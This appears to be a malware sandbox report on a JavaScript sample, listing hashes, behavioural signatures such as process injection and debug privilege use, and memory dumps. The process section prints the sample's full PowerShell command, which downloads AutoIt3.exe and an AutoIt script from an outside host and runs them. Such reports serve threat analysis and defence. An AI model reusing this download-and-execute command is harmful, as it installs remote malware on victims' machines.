Analysis
- max time kernel: 118s
- max time network: 136s
- platform: windows7_x64
- resource: win7-20231023-en
- resource tags: arch:x64, arch:x86, image:win7-20231023-en, locale:en-us, os:windows7-x64, system
- submitted: 08-11-2023 00:56

Tasks
- Static task: static1
- Behavioral task: behavioral1
  Sample: 55610dd00539.js
  Resource: win7-20231023-en (windows7-x64)
  4 signatures, 150 seconds
General
- Target: 55610dd00539.js
- Size: 253KB
- MD5: aeb8f1c6c921fbdde0e82cc6c16d911a
- SHA1: 7f04a7b709a9061dfbea8c0006b116e7639b04ca
- SHA256: 26421886a7d4d780f365d6531d6c945211a5a9d180ea1eda9cafdb8571323d62
- SHA512: e1e441c59c482fe04bf4574d4c473d24a9003c2f57aac7464407827efc461a9b1b7ab11c0045e7a0cd54df7c63e8cfa40debc54e300164f558b85790b7938ad8
- SSDEEP: 6144:ae7hgXeerjqlI2Iro+4e7hgXeerjqlI2Iro+8:aIhgSlI23NIhgSlI23V
- Score: 3/10
Malware Config
Signatures
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes:
    pid   process
    2252  powershell.exe
    2252  powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes:
    description              pid   process
    Token: SeDebugPrivilege  2252  powershell.exe
- Suspicious use of WriteProcessMemory (3 IoCs)
  Processes:
    description                         pid   process      target process
    PID 2772 wrote to memory of 2252    2772  wscript.exe  powershell.exe
    PID 2772 wrote to memory of 2252    2772  wscript.exe  powershell.exe
    PID 2772 wrote to memory of 2252    2772  wscript.exe  powershell.exe
Processes
- C:\Windows\system32\wscript.exe
  Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\55610dd00539.js
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (child of wscript.exe)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ni 'C:/tepp' -Type Directory -Force;cd 'C:/tepp'; Invoke-WebRequest -Uri 'http://adfincolniclo.com:8443' -OutFile 'AutoIt3.exe' -UserAgent 'curl/7.68.0';Invoke-WebRequest -Uri 'http://adfincolniclo.com:8443/msidevqdcds' -OutFile 'devqdcds.au3' -UserAgent 'curl/7.68.0';start 'AutoIt3.exe' -a 'devqdcds.au3'"; Stop-Process -Name "WScript"
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
  File                                                              Filesize
  memory/2252-4-0x000000001B3E0000-0x000000001B6C2000-memory.dmp    2.9MB
  memory/2252-6-0x0000000002360000-0x0000000002368000-memory.dmp    32KB
  memory/2252-5-0x000007FEF55B0000-0x000007FEF5F4D000-memory.dmp    9.6MB
  memory/2252-8-0x0000000002990000-0x0000000002A10000-memory.dmp    512KB
  memory/2252-7-0x0000000002990000-0x0000000002A10000-memory.dmp    512KB
  memory/2252-9-0x0000000002990000-0x0000000002A10000-memory.dmp    512KB
  memory/2252-10-0x000007FEF55B0000-0x000007FEF5F4D000-memory.dmp   9.6MB
  memory/2252-11-0x0000000002990000-0x0000000002A10000-memory.dmp   512KB
  memory/2252-12-0x000007FEF55B0000-0x000007FEF5F4D000-memory.dmp   9.6MB
  memory/2252-13-0x0000000002990000-0x0000000002A10000-memory.dmp   512KB
  memory/2252-15-0x0000000002990000-0x0000000002A10000-memory.dmp   512KB
  memory/2252-14-0x0000000002990000-0x0000000002A10000-memory.dmp   512KB
  memory/2252-16-0x000007FEF55B0000-0x000007FEF5F4D000-memory.dmp   9.6MB
  memory/2252-17-0x000007FEF55B0000-0x000007FEF5F4D000-memory.dmp   9.6MB